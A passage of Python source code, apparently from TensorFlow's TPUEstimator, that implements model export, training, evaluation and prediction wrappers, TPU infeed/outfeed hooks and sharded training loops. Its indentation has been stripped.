assert False, ('Invalid TPUConfig `iterations_per_loop` value. '
'Indicates a bug in `iterations_per_loop` '
'parsing.')
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(self._config, train_batch_size,
eval_batch_size,
predict_batch_size, use_tpu,
eval_on_tpu, embedding_config_spec)
self._export_to_cpu = export_to_cpu
self._export_to_tpu = export_to_tpu
if not (isinstance(export_saved_model_api_version,
ExportSavedModelApiVersion)
or export_saved_model_api_version == 1
or export_saved_model_api_version == 2):
raise ValueError('export_saved_model_api_version should be 1 or 2; '
'got {}.'.format(
export_saved_model_api_version))
self._export_saved_model_api_version = export_saved_model_api_version
self._is_input_fn_invoked = None
self._rendezvous = {}
def _add_meta_graph_for_mode(self,
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None,
check_variables=True,
strip_default_attrs=True):
if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
tf.compat.v1.logging.warn(
'TPUEstimator only handles mode PREDICT for exporting '
'when `export_to_tpu` is `True`; Mode {} will be ignored '
'for TPU.'.format(mode))
if not self._export_to_cpu and not self._export_to_tpu:
raise ValueError('One of export_to_cpu and export_to_tpu must be true.')
if self._export_to_cpu:
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
if self._export_to_tpu and mode == model_fn_lib.ModeKeys.PREDICT:
input_receiver_fn_map = {
_INFERENCE_ON_TPU_MODE: input_receiver_fn_map[mode]
}
export_tags = [tf.saved_model.SERVING, tf.saved_model.TPU]
mode = _INFERENCE_ON_TPU_MODE
# See b/110052256 for why `check_variables` is `False`.
if not self._export_to_cpu:
check_variables = save_variables = True
else:
check_variables = save_variables = False
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
def _call_model_fn(self, features, labels, mode, config):
if mode == _INFERENCE_ON_TPU_MODE:
context = tpu._TPUInferenceContext('tpu_inference', check_ops=False)
try:
context.Enter()
if (
(self._export_saved_model_api_version ==
ExportSavedModelApiVersion.V1)
or self._export_saved_model_api_version == 1):
result = self._call_model_fn_for_inference(features, labels, mode,
config)
else:
result = super(TPUEstimator,
self)._call_model_fn(features, labels, mode, config)
finally:
context.Exit()
return result
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_saved_model`."""
if mode != _INFERENCE_ON_TPU_MODE:
raise ValueError('mode must be {}; '
'got {}.'.format(_INFERENCE_ON_TPU_MODE, mode))
return model_fn_inference_on_tpu(
self._model_fn,
features,
labels,
config,
self._params,
batch_config=None)
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator,
self)._convert_train_steps_to_hooks(steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode, input_context=None):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
input_context: Optional instance of `tf.distribute.InputContext`.
Returns:
In TPU mode, returns an input_fn to be called later in model_fn.
Otherwise, calls the input_fn and returns either features or
(features, labels).
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
if 'input_context' in input_fn_args:
kwargs['input_context'] = input_context
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
if (ctx.is_running_on_cpu() and
ctx.is_input_slice_broadcast_to_all_cores()):
raise ValueError('Invalid TPUConfig `eval_training_input_configuration`'
' value. SLICED mode only works on use_tpu = True.')
# Set the batch size in params first. This helps the user keep the same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
_add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
batch_size_for_input_fn)
# For export_saved_model, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with tf.compat.v1.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has a stronger check. The parent class's check generates a confusing warning message.
Args:
result: `features` returned by input_fn.
"""
pass
def train(self,
input_fn,
hooks=None,
steps=None,
max_steps=None,
saving_listeners=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
try:
return super(TPUEstimator, self).train(
input_fn=input_fn,
hooks=hooks,
steps=steps,
max_steps=max_steps,
saving_listeners=saving_listeners)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('training_loop', sys.exc_info())
finally:
rendezvous.record_done('training_loop')
rendezvous.raise_errors()
def evaluate(self,
input_fn,
steps=None,
hooks=None,
checkpoint_path=None,
name=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
try:
return super(TPUEstimator, self).evaluate(
input_fn,
steps=steps,
hooks=hooks,
checkpoint_path=checkpoint_path,
name=name)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('evaluation_loop', sys.exc_info())
finally:
rendezvous.record_done('evaluation_loop')
rendezvous.raise_errors()
def predict(self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error('prediction_loop', sys.exc_info())
finally:
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_saved_model()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if is_export_mode:
if mode == _INFERENCE_ON_TPU_MODE:
_add_item_to_params(params, _USE_TPU_KEY, True)
mode = model_fn_lib.ModeKeys.PREDICT
else:
_add_item_to_params(params, _USE_TPU_KEY, False)
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
if (self._log_every_n_steps is not None or
self._log_every_n_secs is not None):
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
# pylint:disable=g-long-ternary
output_dir=(self.model_dir
if not config or config.save_summary_steps else None),
# pylint:enable=g-long-ternary
every_n_steps=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
tf.compat.v1.logging.info('Running %s on CPU/GPU', mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
if (self._log_every_n_steps is not None or
self._log_every_n_secs is not None):
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,))
return estimator_spec
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
tpu_init_ops = []
if ctx.embedding_config and mode == model_fn_lib.ModeKeys.TRAIN:
dummy_table_variables, dummy_table_variables_init = (
tpu_embedding_gradient.create_dummy_table_variables(
ctx.embedding_config.tpu_embedding))
ctx.embedding_config.dummy_table_variables = dummy_table_variables
tpu_init_ops.append(dummy_table_variables_init)
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = tf.compat.v1.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
compile_op, loss, host_call, scaffold_fn, training_hooks = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = tf.compat.v1.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
optimization_parameters = (
ctx.embedding_config.tpu_embedding.optimization_parameters)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, slot_variable_names_by_table = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict, optimization_parameters))
else:
embedding_variable_name_by_table = None
slot_variable_names_by_table = None
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table,
slot_variable_names_by_table))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after the variables for TPU embedding have
# been created on CPU, as the user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
host_ops = host_call.create_tpu_hostcall()
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'reset_computation')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(),
]
elif shutdown_mode == 'shutdown_all_workers':
finalizer_hooks = [
session_support.ShutdownAllWorkers(),
]
elif shutdown_mode == 'reset_computation':
finalizer_hooks = [
session_support.ResetComputation(),
]
elif not shutdown_mode:
finalizer_hooks = []
else:
raise ValueError('Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' %
shutdown_mode)
if finalizer_hooks:
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks))
with tf.control_dependencies([loss]):
global_step = tf.identity(tf.compat.v1.train.get_global_step())
hooks = input_hooks + shutdown_hooks
if ctx.feed_hook is not None:
tf.compat.v1.logging.info(
'Use user implemented tpu infeed outfeed session hook class.')
infeed_outfeed_session_hook_class = ctx.feed_hook
else:
infeed_outfeed_session_hook_class = TPUInfeedOutfeedSessionHook
hooks.extend([
infeed_outfeed_session_hook_class(
ctx,
enqueue_ops,
host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops,
outfeed_every_n_steps=self._config.tpu_config
.experimental_host_call_every_n_steps),
InstallSignalHandlerHook()
])
if _check_add_preemption_hook(self._config.cluster):
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if (self._log_every_n_steps is not None or
self._log_every_n_secs is not None):
if self._iterations_per_training_loop.unit == 'count':
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
hooks.append(
tf.compat.v1.train.LoggingTensorHook(
{
'loss': tf.identity(loss),
'step': global_step,
},
every_n_iter=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs))
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
if (self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps):
checkpoint_hook = tf.compat.v1.train.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold,
save_graph_def=self._config.checkpoint_save_graph_def)
if self._iterations_per_training_loop.unit == 'count':
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
else:
# When estimating iterations_per_loop, set steps_per_run to an
# arbitrarily high number to force checking the global step on
# every call.
# TODO(henrytan): refactor SecondOrStepTimer to do this more
# explicitly.
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
100000)
chief_hooks.append(checkpoint_hook)
else:
tf.compat.v1.logging.info('Bypassing TPUEstimator hook')
tf.compat.v1.summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with tf.control_dependencies([loss]):
update_ops = _sync_variables_ops(ctx)
if ctx.embedding_config:
update_ops.extend(embedding_variables_and_ops.retrieve_ops())
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph(ctx)
train_op = tf.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
compile_op, total_loss, host_calls, scaffold_fn, eval_hooks = (
_eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = tf.compat.v1.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, _ = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict))
else:
embedding_variable_name_by_table = None
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after the variables for TPU embedding have
# been created on CPU, as the user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = tf.compat.v1.div(
total_loss,
tf.cast(iterations_per_loop_var, dtype=total_loss.dtype))
with tf.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops(ctx)
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
eval_metrics = host_call_ret.get('eval_metrics', {})
if eval_metrics:
# Creates a dummy metric update_op for all metrics. Estimator
# expects all metrics in `eval_metric_ops` have update_op and calls
# them one by one. The real metric update_ops are invoked in a
# separate thread. So, here we give Estimator the dummy op for all
# metrics.
with tf.control_dependencies(internal_ops_to_run):
dummy_update_op = tf.no_op()
for k, v in eval_metrics.items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
else:
# If no eval metrics are passed, create an identity node for the
# loss and add `internal_ops_to_run` to its dependencies. So
# `internal_ops_to_run` can be executed.
with tf.control_dependencies(internal_ops_to_run):
mean_loss = tf.identity(mean_loss)
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.evaluation_master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops)
] + input_hooks
if _check_add_preemption_hook(self._config.cluster):
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(compile_op, dummy_predict_op, host_calls, scaffold_fn,
prediction_hooks) = _predict_on_tpu_system(ctx, model_fn_wrapper,
dequeue_fn)
scaffold = _get_scaffold(scaffold_fn)
with tf.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops(ctx)
with tf.control_dependencies(internal_ops_to_run):
dummy_predict_op = tf.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yields the element (via generator) to the call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
#    to form a single invocation. This avoids the issue that we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions,
message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with tf.control_dependencies(host_ops):
host_ops = []  # Empty, we do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx,
enqueue_ops,
host_ops,
rendezvous=self._rendezvous[mode],
tpu_compile_op=compile_op,
master=self._config.master,
session_config=self._session_config),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _check_add_preemption_hook(cluster):
return (tpu_cluster_resolver.is_running_in_gce() and cluster and isinstance(
cluster, tf.distribute.cluster_resolver.TPUClusterResolver) and
cluster._cloud_tpu_client.api_available())
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return list(export_output.outputs.values())
else:
raise ValueError(
'`export_output` must have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError('tensors must be of length 2; '
'got {}.'.format(len(tensors)))
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError('tensors must be of length 1; '
'got {}'.format(len(tensors)))
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors)))
else:
raise ValueError(
'`export_output` must have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
) = model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_eval_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
# replica as an array. As such, reshape the input back to a
# scalar.
replica_id = tf.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
return training_loop.repeat(iterations_per_loop_var, single_tpu_eval_step,
[_ZERO_LOSS])
# Add input that represents id for each replica in sync so that
# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append([tf.constant(i) for i in range(ctx.num_replicas)])
(
compile_op,
loss,
) = tpu.split_compile_and_shard(
multi_tpu_eval_steps_on_single_shard,
inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_calls, captured_scaffold_fn,
captured_eval_hooks.get())
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_train_step, host_call, captured_scaffold_fn,
captured_training_hooks) = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
@tpu_function.on_device_training_loop
def multi_tpu_train_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
# replica as an array. As such, reshape the input back to a
# scalar.
replica_id = tf.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
outputs = training_loop.while_loop(
lambda i, loss: i < iterations_per_loop_var,
lambda i, loss: [i + 1, single_tpu_train_step(i)],
inputs=[0, _INITIAL_LOSS])
return outputs[1:]
# Add input that represents id for each replica in sync so that
# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append([tf.constant(i) for i in range(ctx.num_replicas)])
(compile_op, loss) = tpu.split_compile_and_shard(
multi_tpu_train_steps_on_single_shard,
inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_call, captured_scaffold_fn,
captured_training_hooks.get())
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
(single_tpu_predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks
) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_predict_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
# replica as an array. As such, reshape the input back to a
# scalar.
replica_id = tf.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
def cond(scalar_stopping_signal):
return tf.math.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
# Add input that represents id for each replica in sync so that
# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append([tf.constant(i) for i in range(ctx.num_replicas)])
(
compile_op,
dummy_predict_op,
) = tpu.split_compile_and_shard(
multi_tpu_predict_steps_on_single_shard,
inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
dummy_predict_op = dummy_predict_op[0]
return (compile_op, dummy_predict_op, host_calls, captured_scaffold_fn,
captured_predict_hooks.get())
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with tf.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with tf.compat.v1.device(device):
iterations = tf.identity(iterations_per_loop_var)
return tf.compat.v1.while_loop(
lambda i: i < iterations,
computation, [tf.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return tf.math.logical_not(_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with tf.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with tf.compat.v1.device(device):
return tf.compat.v1.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph(ctx):
"""Validate graph before running distributed training.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If the graph seems invalid for running on device
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return # b/124241278
operations = tf.compat.v1.get_default_graph().get_operations()
# Check that there is at least one CrossReplicaSum operation in the graph.
# This should be introduced by using the CrossShardOptimizer wrapper
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops and ctx.num_replicas > 1:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can capture only once. Please file bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file bug.')
return self._object
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def to_control_flow_context_def(self, context_def, export_scope=None):
# pylint: disable=useless-super-delegation
# NOTE(slebedev): the method is required by `ControlFlowContext`.
super(_CapturingContext,
self).to_control_flow_context_def(context_def, export_scope)
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def AddValue(self, value):
self.AddOp(value.op)
return value
def __enter__(self):
# pylint: disable=protected-access
self._g = tf.compat.v1.get_default_graph()
self._old = self._g._get_control_flow_context()
